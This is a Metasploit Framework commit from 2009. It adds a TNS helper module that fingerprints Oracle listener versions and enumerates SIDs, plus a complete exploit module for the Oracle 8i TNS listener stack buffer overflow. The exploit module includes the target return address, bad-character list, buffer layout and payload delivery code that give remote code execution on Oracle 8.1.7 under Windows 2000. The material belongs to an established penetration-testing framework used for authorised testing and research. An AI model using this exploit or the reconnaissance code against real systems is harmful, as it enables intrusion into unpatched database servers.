added tns mixin to support oracle8i listener overflow and other tns

related stuff. git-svn-id: file:///home/svn/framework3/trunk@6082 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-07 03:07:01 +00:00 · 2009-01-07 03:07:01 +00:00 · ee86b19834
parent 41fbd5500e
commit ee86b19834
3 changed files with 207 additions and 0 deletions
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@ -238,6 +238,7 @@ class Exploit < Msf::Module
 	require 'msf/core/exploit/imap'
 	require 'msf/core/exploit/smtp_deliver'
 	require 'msf/core/exploit/pop2'
+	require 'msf/core/exploit/tns'
 	
 	# Networks
 	require 'msf/core/exploit/lorcon'
--- a/lib/msf/core/exploit/tns.rb
+++ b/lib/msf/core/exploit/tns.rb
@ -0,0 +1,113 @@
+require 'msf/core'
+
+module Msf
+
+###
+#
+# This module exposes methods for querying a remote TNS service
+#
+###
+module Exploit::Remote::TNS
+	
+	include Exploit::Remote::Tcp
+	
+	#
+	# Creates an instance of a TNS exploit module.
+	#
+	def initialize(info = {})
+		super
+
+		# Register the options that all TNS exploits may make use of.
+		register_options(
+			[
+				Opt::RHOST,
+				Opt::RPORT(1521),
+			], Msf::Exploit::Remote::TNS)
+	end
+
+	def tns_packet(connect_data)
+
+		packet_length = [58 + connect_data.length].pack('n')
+	
+		# Packet length
+		pkt =  packet_length
+		# Checksum
+		pkt << "\x00\x00"
+		# Packet Type: Connect(1)
+		pkt << "\x01"
+		# Reserved
+		pkt << "\x00"
+		# Header Checksum
+		pkt << "\x00\x00"
+		# Version
+		pkt << "\x01\x36"
+		# Version (Compatible)
+		pkt << "\x01\x2C"
+		pkt << "\x00\x00\x08\x00"
+		pkt << "\x7F\xFF"
+		pkt << "\x7F\x08"
+		pkt << "\x00\x00"
+		pkt << "\x00\x01"
+		pkt << [connect_data.length].pack('n')
+		pkt << "\x00\x3A"
+		pkt << "\x00\x00\x00\x00"
+		pkt << "\x00\x00\x00\x00"
+		pkt << "\x00"
+		pkt << "\x00"
+		pkt << "\x00\x00\x00\x00"
+		# Unique Connection ID
+		pkt << "\x00\x00\x34\xE6\x00\x00\x00\x01"
+		# Connect Data
+		pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
+		pkt << connect_data
+
+		return pkt
+
+	end
+	
+	def get_version
+		connect_data = "(CONNECT_DATA=(COMMAND=VERSION))"
+		pkt = tns_packet(connect_data)
+
+		sock.put(pkt)
+		
+		sock.get_once
+
+		data = sock.get_once(-1,1)
+
+		if ( data and data =~ /\\*.TNSLSNR for (.*)/ )
+			return print_status("Host #{rhost} is running: " + $1)
+		else
+			return print_error("Unable to determine version info for #{rhost}...")
+		end
+	end
+
+	def get_sid
+		connect_data = "(CONNECT_DATA=(COMMAND=STATUS))"
+		pkt = tns_packet(connect_data)
+
+		sock.put(pkt)
+
+		sleep(1)
+
+		data = sock.get_once
+	
+		if ( data =~ /ERROR_STACK/ )
+			print_error("TNS listener protected for #{rhost}...")
+
+		else
+
+		sid = data.scan(/INSTANCE_NAME=(\w+)/)
+			sid.uniq.each do |s|
+				print_status("Identified SID for #{rhost}: #{s}")
+			end
+
+		end 
+
+		service_name = data.scan(/SERVICE_NAME=(\w+)/)
+			service_name.each do |s|
+				print_status("Identified SERVICE_NAME for #{rhost}: #{s}")
+			end
+	end
+end
+end
--- a/modules/exploits/windows/oracle/oracle_tns.rb
+++ b/modules/exploits/windows/oracle/oracle_tns.rb
@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::TNS
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle 8i TNS Listener Buffer Overflow.',
+			'Description'    => %q{
+				This module exploits a stack overflow in Oracle 8i. When
+				sending a specially crafted packet to the TNS service, an
+				attacker may be able to execute arbitrary code.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,			
+			'Version'        => '$Revision:$',
+			'References'     => 
+				[ 
+					[ 'CVE', '2001-499' ],
+					[ 'BID', '2941' ],
+				],
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 600,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Ret' => 0x60a1e154 } ],
+				],
+			'DefaultTarget' => 0,
+			'DisclosureDate' => 'Jun 28 2001'))
+
+			register_options([Opt::RPORT(1521)], self.class)
+
+	end
+
+	def check
+		connect
+
+		version = "(CONNECT_DATA=(COMMAND=VERSION))"
+	
+		pkt = tns_packet(version)
+
+		sock.put(pkt)
+		
+		sock.get_once
+
+		res = sock.get_once(-1, 1)
+		
+		disconnect
+
+			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
+				return Exploit::CheckCode::Vulnerable
+			end
+				return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		connect
+
+			buff =  rand_text_alpha_upper(6383 - payload.encoded.length) + payload.encoded
+			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
+			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)
+
+			sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"
+			
+			pkt = tns_packet(sploit)
+
+			print_status("Trying target #{target.name}...")
+			sock.put(pkt)
+
+			handler
+
+		disconnect
+	end
+
+end